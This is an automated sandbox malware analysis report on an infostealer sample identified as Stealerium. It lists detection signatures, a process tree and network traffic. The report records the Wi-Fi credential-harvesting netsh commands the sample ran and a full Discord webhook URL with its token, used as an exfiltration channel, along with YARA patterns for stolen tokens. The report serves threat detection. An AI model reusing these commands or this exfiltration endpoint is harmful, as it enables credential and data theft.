Edit tour

Windows Analysis Report
build (2).bin

Overview

General Information

Sample Name:	build (2).bin (renamed file extension from bin to exe)
Analysis ID:	649602
MD5:	7565784c6e2cca725b1cdd88200186fc
SHA1:	4e40bde881e956d839dfb2093df296ceb84336c1
SHA256:	de4c002d5b5981476ecd950c93a32496008a865c9e72d3e0ad63b218a858beae
Tags:	exeFormbookStealerium
Infos:

Detection

Stealerium

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Stealerium

Malicious sample detected (through community Yara rule)

Sigma detected: Capture Wi-Fi password

Antivirus / Scanner detection for submitted sample

Uses netsh to modify the Windows network and firewall settings

.NET source code references suspicious native API functions

Yara detected Costura Assembly Loader

Contains functionality to log keystrokes (.Net Source)

Tries to harvest and steal WLAN passwords

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

May check the online IP address of the machine

Yara detected Generic Downloader

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Found many strings related to Crypto-Wallets (likely being stolen)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Enables debug privileges

Queries information about the installed CPU (vendor, model number etc)

Queries the product ID of Windows

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a window with clipboard capturing capabilities

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

build (2).exe (PID: 3704 cmdline: "C:\Users\user\Desktop\build (2).exe" MD5: 7565784C6E2CCA725B1CDD88200186FC)

cmd.exe (PID: 6232 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chcp.com (PID: 6388 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)

netsh.exe (PID: 6460 cmdline: netsh wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

findstr.exe (PID: 6492 cmdline: findstr All MD5: 8B534A7FC0630DE41BB1F98C882C19EC)

cmd.exe (PID: 6552 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chcp.com (PID: 6712 cmdline: chcp 65001 MD5: 561054CF9C4B2897E80D7E7D9027FED9)

netsh.exe (PID: 6768 cmdline: netsh wlan show networks mode=bssid MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

msiexec.exe (PID: 6340 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
build (2).exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
build (2).exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
build (2).exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
build (2).exe	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
build (2).exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x175927:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
build (2).exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x17baa2:$s1: \VPN\NordVPN 0x17ba88:$s2: \VPN\OpenVPN 0x17ba6a:$s3: \VPN\ProtonVPN
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x175727:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3e5c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x175727:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: build (2).exe PID: 3704	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: build (2).exe PID: 3704	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: build (2).exe PID: 3704	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1875ea:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.build (2).exe.130000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.build (2).exe.130000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.0.build (2).exe.130000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.build (2).exe.130000.0.unpack	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
0.0.build (2).exe.130000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x175927:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.0.build (2).exe.130000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x17baa2:$s1: \VPN\NordVPN 0x17ba88:$s2: \VPN\OpenVPN 0x17ba6a:$s3: \VPN\ProtonVPN
0.2.build (2).exe.130000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.build (2).exe.130000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.build (2).exe.130000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.build (2).exe.130000.0.unpack	JoeSecurity_Stealerium	Yara detected Stealerium	Joe Security
0.2.build (2).exe.130000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x175927:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.build (2).exe.130000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x17baa2:$s1: \VPN\NordVPN 0x17ba88:$s2: \VPN\OpenVPN 0x17ba6a:$s3: \VPN\ProtonVPN
Click to see the 7 entries

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\build (2).exe" , ParentImage: C:\Users\user\Desktop\build (2).exe, ParentProcessId: 3704, ParentProcessName: build (2).exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 6232, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: build (2).exe	Virustotal: Detection: 61%			Perma Link
Source: build (2).exe	ReversingLabs: Detection: 62%

Antivirus / Scanner detection for submitted sample

Source: build (2).exe

Avira: detected

Machine Learning detection for sample

Source: build (2).exe

Joe Sandbox ML: detected

Source: build (2).exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.80.29.83:443 -> 192.168.2.4:49806 version: TLS 1.2

Source: build (2).exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: .16.0.0, Culture=neutral, PublicKeyToken=6583c7c814667745\|DotNetZip.dll\|1EE724DAAF70C6B0083BF589674B6F6D8427544F\|472064 costura.dotnetzip.pdb.compressed\|\|\|DotNetZip.pdb\|565BABCBCD978AF66FE1150CC58FDEAFC9815822\|622080 costura.microsoft.bcl.asyncinterfaces.dll source: build (2).exe
Source:	Binary string: ~l costura.dotnetzip.pdb.compressed source: build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.polly.pdb.compressed\|\|\|Polly.pdb\|FD65CB8378305DD2185A5847C599E82A6AA5AD7A\|81672 source: build (2).exe
Source:	Binary string: costura.dotnetzip.pdb.compressed source: build (2).exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed-discord-webhook-client[costura.discord-webhook-client.dll.compressed source: build (2).exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.polly.pdb.compressed source: build (2).exe
Source:	Binary string: costura.costura.pdb.compressed source: build (2).exe
Source:	Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdb source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed\|\|\|DotNetZip.pdb\|565BABCBCD978AF66FE1150CC58FDEAFC9815822\|622080 source: build (2).exe
Source:	Binary string: dotnetzipAcostura.dotnetzip.dll.compressedAcostura.dotnetzip.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed source: build (2).exe
Source:	Binary string: ll.compressed\|7.0.0.0\|Polly, Version=7.0.0.0, Culture=neutral, PublicKeyToken=c8a3ffc3f8f825cc\|Polly.dll\|D40D09B9BC8B46EBFE63C6B8E605827156146983\|274944 costura.polly.pdb.compressed\|\|\|Polly.pdb\|FD65CB8378305DD2185A5847C599E82A6AA5AD7A\|81672 costura.system.bu source: build (2).exe
Source:	Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdbSHA256 source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: build (2).exe, 00000000.00000002.531081210.0000000005050000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.530316264.0000000003799000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: build (2).exe
Source:	Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: build (2).exe
Source:	Binary string: costura.costura.dll.compressed\|5.7.0.0\|Costura, Version=5.7.0.0, Culture=neutral, PublicKeyToken=null\|Costura.dll\|F1F25C01F6ACF33BDD62C4F82D3EF078E76F0906\|4608 costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 costura source: build (2).exe

Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\GAOBCVIQIJ.jpg	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Desktop\	Jump to behavior

Networking

May check the online IP address of the machine

Source: C:\Users\user\Desktop\build (2).exe	DNS query: name: ip-api.com
Source: C:\Users\user\Desktop\build (2).exe	DNS query: name: icanhazip.com
Source: C:\Users\user\Desktop\build (2).exe	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: icanhazip.com

Yara detected Generic Downloader

Source: Yara match	File source: build (2).exe, type: SAMPLE
Source: Yara match	File source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wllkm5eEvJRRHZgq09CglFP4ccIwK3 HTTP/1.1Host: canary.discord.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /getServer HTTP/1.1Host: apiv2.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757

Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://canary.discord.com
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: build (2).exe, 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com4
Source: build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com4
Source: build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store2.gofile.io
Source: build (2).exe, 00000000.00000002.530316264.0000000003799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/binaryformatter
Source: build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org4
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apiv2.gofile.io
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apiv2.gofile.io/getServer
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canary.discord.com
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525847639.00000000025CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canary.discord.com/api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wll
Source: build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canary.discord.com4
Source: tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
